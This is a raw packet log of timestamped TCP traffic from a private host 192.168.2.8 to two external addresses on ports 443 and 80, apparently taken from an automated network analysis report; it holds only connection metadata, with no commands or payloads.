                                                                                                                                                                      Nov 26, 2024 09:32:59.503093004 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.503133059 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.506846905 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.506855011 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.506915092 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.506927967 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.507009983 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.510740042 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.510802031 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.510808945 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.515785933 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.515851021 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.515858889 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.519540071 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.519596100 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.519601107 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.523478031 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.523535967 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.523541927 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.528503895 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.528558969 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.528565884 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.532404900 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.532459974 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.532464027 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.536730051 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.536783934 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.536789894 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.540689945 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.540743113 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.540750980 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.545770884 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.545823097 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.545830011 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.578495979 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.578639030 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.578649998 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.581480980 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.581487894 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:32:59.581553936 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:32:59.581559896 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.182537079 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.182547092 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.182590008 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.186552048 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.186567068 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.186615944 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.186620951 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.186747074 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.190592051 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.190603018 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.190680981 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.190687895 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.237787008 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.300405979 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.300421953 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.300467968 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.300491095 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.300503969 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.303917885 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.303981066 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.303991079 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.303997993 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.304028988 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.307760000 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.307770967 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.307828903 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.307837963 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.307928085 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.312870979 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.312966108 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.312978029 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.316802979 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.316865921 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.316875935 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.321770906 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.321841002 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.321854115 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.326054096 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.326138973 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.326149940 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.329765081 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.329833031 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.329843998 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.334515095 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.334574938 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.334590912 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.338315964 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.338383913 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.338392973 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.342964888 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.343028069 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.343039036 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.346688986 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.346775055 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.346785069 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.351680040 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.351753950 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.351766109 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.384119987 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.384207964 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.384228945 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.388098001 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.388111115 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.388201952 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.388211966 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.391871929 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.391927004 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.391932964 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.391938925 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.391977072 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.501887083 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.501920938 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.501975060 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.502010107 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.502031088 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.505686045 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.505754948 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.505763054 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.509514093 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.509596109 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.509603024 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.514467001 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.514575005 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.514583111 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.518385887 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.518457890 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.518465042 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.523716927 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.523792982 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.523801088 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.527234077 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.527307987 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.527319908 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.531261921 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.531335115 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.531341076 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.536336899 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.536407948 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.536413908 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.539923906 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.539997101 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.540004015 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.544498920 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.544564962 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.544576883 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.548317909 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.548429012 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.548434973 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.553388119 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.553462029 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.553467035 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.585621119 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.585715055 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.585735083 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.589514017 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.589534044 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.589621067 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:00.589632988 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:00.594469070 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:01.135719061 CET44349707193.30.119.205192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:01.135772943 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:01.187323093 CET49707443192.168.2.8193.30.119.205
                                                                                                                                                                      Nov 26, 2024 09:33:16.128000975 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:16.248087883 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:16.248209000 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:16.248311043 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:16.368804932 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533216953 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533777952 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533790112 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533801079 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533811092 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533823013 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533834934 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533845901 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533855915 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533869028 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.533881903 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.533932924 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.533966064 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.654259920 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.654274940 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.654417038 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.658118963 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.706590891 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.734846115 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.735188961 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.735383987 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.739021063 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.739140987 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.739198923 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.747908115 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.747967005 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.748033047 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.755929947 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.756063938 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.756108999 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.764406919 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.764513969 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.764579058 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.772867918 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.772963047 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.773011923 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.781313896 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.781367064 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.781433105 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.789776087 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.789870977 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.789916992 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.798230886 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.798327923 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.798393011 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.806742907 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.806824923 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.806888103 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.826591969 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.826886892 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.826953888 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.830821991 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.878606081 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.936290979 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.936373949 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.936431885 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.938936949 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.939053059 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.939132929 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.943770885 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.943892956 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.943953991 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.948878050 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.948976040 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.949733019 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.953934908 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.954061031 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.954220057 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.959028959 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.959155083 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.959264040 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.964128017 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.964229107 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.964335918 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.969204903 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.969324112 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.969440937 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.974284887 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.974406958 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.974620104 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.979413986 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.979471922 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.979645014 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.984512091 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.984627008 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.984878063 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.989722013 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.989871025 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.989995003 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.994703054 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.994815111 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.995018959 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:17.999778032 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.999893904 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:17.999941111 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.004867077 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.004911900 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.004960060 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.010180950 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.010274887 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.010330915 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.015013933 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.015142918 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.015254974 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.020123959 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.020193100 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.020406008 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.025271893 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.025326967 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.025374889 CET4971180192.168.2.85.182.211.149
                                                                                                                                                                      Nov 26, 2024 09:33:18.030273914 CET80497115.182.211.149192.168.2.8
                                                                                                                                                                      Nov 26, 2024 09:33:18.030405998 CET80497115.182.211.149192.168.2.8
Nov 26, 2024 09:33:18.030499935 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.035415888 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.035459995 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.035514116 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.137550116 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.137722969 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.137849092 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.139589071 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.139702082 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.139744043 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.143297911 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.143435955 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.143511057 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
Nov 26, 2024 09:33:18.147011042 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.147104979 CET | 80 | 49711 | 5.182.211.149 | 192.168.2.8
Nov 26, 2024 09:33:18.147227049 CET | 49711 | 80 | 192.168.2.8 | 5.182.211.149
